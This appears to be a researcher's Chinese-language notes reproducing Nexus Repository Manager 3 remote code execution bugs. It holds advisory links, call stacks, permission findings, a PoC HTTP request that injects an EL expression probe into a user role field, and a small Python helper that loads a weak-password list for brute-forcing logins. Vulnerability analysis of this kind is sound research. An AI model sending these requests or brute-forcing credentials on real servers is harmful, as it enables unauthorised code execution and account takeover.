[CVE-2020-10199/10204] Nexus Repository Manager 3 RCE

参考

• https://support.sonatype.com/hc/en-us/articles/360044882533
• https://cloud.tencent.com/announce/detail/1023
• https://mp.weixin.qq.com/s/xUWPVwcNL6n6snn_gV_UwA
• https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf
• https://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf
• https://github.com/threedr3am/learnjavabug/tree/master/nexus/CVE-2020-10199
• https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype

CVE-2020-10199

漏洞描述

XSS就算了。
RCE：

an attacker with any type of account on NXRM to execute arbitrary code by crafting a malicious request to NXRM

影响范围：<= 3.21.1

http://download.sonatype.com/nexus/3/nexus-3.21.1-01-unix.tar.gz

修复版本：3.21.2

http://download.sonatype.com/nexus/3/nexus-3.21.2-03-unix.tar.gz

调用栈：

getValue:193, ValueExpressionImpl (com.sun.el)
interpolate:67, ElTermResolver (org.hibernate.validator.internal.engine.messageinterpolation)
interpolate:64, InterpolationTerm (org.hibernate.validator.internal.engine.messageinterpolation)
interpolate:112, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolateExpression:451, AbstractMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolateMessage:347, AbstractMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolate:286, AbstractMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolate:313, AbstractValidationContext (org.hibernate.validator.internal.engine.validationcontext)
addConstraintFailure:230, AbstractValidationContext (org.hibernate.validator.internal.engine.validationcontext)
validateConstraints:79, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
doValidateConstraint:130, MetaConstraint (org.hibernate.validator.internal.metadata.core)
validateConstraint:123, MetaConstraint (org.hibernate.validator.internal.metadata.core)
validateMetaConstraint:555, ValidatorImpl (org.hibernate.validator.internal.engine)
validateConstraintsForSingleDefaultGroupElement:518, ValidatorImpl (org.hibernate.validator.internal.engine)
validateConstraintsForDefaultGroup:488, ValidatorImpl (org.hibernate.validator.internal.engine)
validateConstraintsForCurrentGroup:450, ValidatorImpl (org.hibernate.validator.internal.engine)
validateInContext:400, ValidatorImpl (org.hibernate.validator.internal.engine)
validate:172, ValidatorImpl (org.hibernate.validator.internal.engine)
createViolation:64, ConstraintViolationFactory (org.sonatype.nexus.validation)
validateGroupMembers:96, AbstractGroupRepositoriesApiResource (org.sonatype.nexus.repository.rest.api)
createRepository:66, AbstractGroupRepositoriesApiResource (org.sonatype.nexus.repository.rest.api)
createRepository:74, BowerGroupRepositoriesApiResource (org.sonatype.nexus.repository.bower.rest)
CGLIB$createRepository$1:-1, BowerGroupRepositoriesApiResource$$EnhancerByGuice$$da7a5161 (org.sonatype.nexus.repository.bower.rest)
invoke:-1, BowerGroupRepositoriesApiResource$$EnhancerByGuice$$da7a5161$$FastClassByGuice$$b07abeb1 (org.sonatype.nexus.repository.bower.rest)
invokeSuper:228, $MethodProxy (com.google.inject.internal.cglib.proxy)
proceed:76, InterceptorStackCallback$InterceptedMethodInvocation (com.google.inject.internal)
invoke:53, ValidationInterceptor (org.sonatype.nexus.validation.internal)
proceed:77, InterceptorStackCallback$InterceptedMethodInvocation (com.google.inject.internal)
proceed:49, AopAllianceMethodInvocationAdapter (org.apache.shiro.guice.aop)
invoke:68, AuthorizingAnnotationMethodInterceptor (org.apache.shiro.authz.aop)
invoke:36, AopAllianceMethodInterceptorAdapter (org.apache.shiro.guice.aop)
proceed:77, InterceptorStackCallback$InterceptedMethodInvocation (com.google.inject.internal)
intercept:55, InterceptorStackCallback (com.google.inject.internal)
createRepository:-1, BowerGroupRepositoriesApiResource$$EnhancerByGuice$$da7a5161 (org.sonatype.nexus.repository.bower.rest)
invoke:-1, GeneratedMethodAccessor275 (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invoke:140, MethodInjectorImpl (org.jboss.resteasy.core)
invokeOnTarget:294, ResourceMethodInvoker (org.jboss.resteasy.core)
invoke:248, ResourceMethodInvoker (org.jboss.resteasy.core)
invoke:235, ResourceMethodInvoker (org.jboss.resteasy.core)
invoke:402, SynchronousDispatcher (org.jboss.resteasy.core)
invoke:209, SynchronousDispatcher (org.jboss.resteasy.core)
service:227, ServletContainerDispatcher (org.jboss.resteasy.plugins.server.servlet)
service:56, HttpServletDispatcher (org.jboss.resteasy.plugins.server.servlet)
service:51, HttpServletDispatcher (org.jboss.resteasy.plugins.server.servlet)
service:109, ComponentContainerImpl (org.sonatype.nexus.siesta.internal.resteasy)
service:137, SiestaServlet (org.sonatype.nexus.siesta)
...

CVE-2020-10204

• create/update Role的接口需要相应的nx-roles-create/nx-roles-update权限；
• create/update User的接口需要相应的nx-users-create/nx-users-update权限。

官方漏洞描述：

The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM.

参考：
https://support.sonatype.com/hc/en-us/articles/360044356194-CVE-2020-10204-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31

应该是CVE-2018-16621的绕过吧。
在Mac上复现成功。

还有一处需要管理员触发的地方是，创建cleanup_CleanupPolicy，然后payload在format里，然后第二步通过调用某些可以调用cleanupPolicy的接口：
比如/service/rest/beta/repositories/apt/hosted，指定policy的name：

"cleanup": {
    "policyNames": ["myPolicyName"]
  }

触发EL表达式。

参考：https://github.com/threedr3am/learnjavabug/blob/master/nexus/CVE-2020-10199/README.md

CVE-2018-16621 Nexus EL表达式注入

参考：https://github.com/Cryin/Paper/blob/master/CVE-2018-16621%20Nexus%20Repository%20Manager3%20%E4%BB%BB%E6%84%8FEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5.md

PoC：

POST /service/extdirect HTTP/1.1
Host: 192.168.85.129:8081
Content-Type: application/json
Connection: close
Cookie: fusionauth.locale=zh_CN; remember-me=YWRtaW46MTU4NjQyMDcwNTI5ODo5ZmJhMGViMDFjYjM2MmEzNGU5YWQ2MTExYTYwZWNjNQ; JSESSIONID=FD1D448F8785A262DC6453B773955371; username="FS1YvSKKiX8_"; password="FS1YvSKKiX8_"; rememberme="false"; validation="8ab366e87f98368ce07c2c89f9064073"; XSRF-TOKEN=46b5a232-f694-4e27-930d-9e0163f5e310; NXSESSIONID=e5682534-b930-4491-ab86-aa02e5f32a12
Content-Length: 218

{"action":"coreui_User","method":"create","data":[{"userId":"test123","firstName":"77","lastName":"cai","password":"password","email":"[email protected]","status":"active","roles":["nx-admin${7776+1}"]}],"type":"rpc","tid":49}

当请求的role名不存在时，会加入到missing中，
nexus-3.13.0-01\system\org\sonatype\nexus\nexus-security\3.13.0-01\nexus-security-3.13.0-01.jar!\org\sonatype\nexus\security\role\RolesExistValidator#isValid

            try {
                this.authorizationManager.getRole(String.valueOf(item));
            } catch (NoSuchRoleException var6) {
                missing.add(item);
            }

最后跟到这里：
nexus-3.13.0-01\system\org\hibernate\hibernate-validator\5.1.2.Final\hibernate-validator-5.1.2.Final.jar!\org\hibernate\validator\internal\engine\messageinterpolation\InterpolationTerm#interpolateExpressionLanguageTerm

部分调用栈贴一下：

interpolateExpressionLanguageTerm:112, InterpolationTerm (org.hibernate.validator.internal.engine.messageinterpolation)
interpolate:90, InterpolationTerm (org.hibernate.validator.internal.engine.messageinterpolation)
interpolateExpression:342, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolateMessage:298, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolate:182, ResourceBundleMessageInterpolator (org.hibernate.validator.messageinterpolation)
interpolate:362, ValidationContext (org.hibernate.validator.internal.engine)
createConstraintViolation:271, ValidationContext (org.hibernate.validator.internal.engine)
createConstraintViolations:232, ValidationContext (org.hibernate.validator.internal.engine)
validateSingleConstraint:291, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
validateConstraints:133, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
validateConstraints:91, ConstraintTree (org.hibernate.validator.internal.engine.constraintvalidation)
validateConstraint:83, MetaConstraint (org.hibernate.validator.internal.metadata.core)
validateConstraint:547, ValidatorImpl (org.hibernate.validator.internal.engine)
validateConstraintsForNonDefaultGroup:511, ValidatorImpl (org.hibernate.validator.internal.engine)
validateConstraintsForCurrentGroup:448, ValidatorImpl (org.hibernate.validator.internal.engine)
validateInContext:403, ValidatorImpl (org.hibernate.validator.internal.engine)
validateCascadedConstraint:723, ValidatorImpl (org.hibernate.validator.internal.engine)
validateCascadedConstraints:601, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParametersInContext:992, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParameters:300, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParameters:254, ValidatorImpl (org.hibernate.validator.internal.engine)
validateParameters:65, ValidationInterceptor (org.sonatype.nexus.validation.internal)
invoke:51, ValidationInterceptor (org.sonatype.nexus.validation.internal)

执行完之后：

证明确实在这里执行了EL表达式。

权限问题

Nexus的权限很多，也很细，
CVE-2018-16621：An attacker with administrative privileges
CVE-2020-10199：an attacker with any type of account on NXRM（我试了至少需要repository-admin-*-*-add权限，不过据说有某些版本区间（「a window of versions」）的未授权RCE，但是我没复现出来）
CVE-2020-10204：an attacker with an administrative account on NXRM（我试了至少需要这个权限：nx-users-create）

参考：
CVE-2018-16621
CVE-2020-10199
CVE-2020-10204

杂

历史版本下载：

https://help.sonatype.com/repomanager3/download/download-archives---repository-manager-3

在Windows上，报了这个错：

javax.el.ELException: java.lang.IllegalArgumentException: object is not an instance of declaring class

参考：
https://stackoverflow.com/questions/53021763/cannot-open-local-storage-nexus3-db-config-with-mode-rw-db-name-config

将nexus换到另一个目录下，可能跟之前启动的nexus外面的sonatype-work目录的orintdb冲突了。

爆破弱密码

可以使用pocsuite自带的字典：

# 为了拿到password-top100.txt
from pocsuite3.lib.core.data import paths

    def get_password_dict(self):
        f = open(paths.WEAK_PASS)
        pwddict = []
        for item in f.readlines():
            pwddict.append(item.strip())
        return pwddict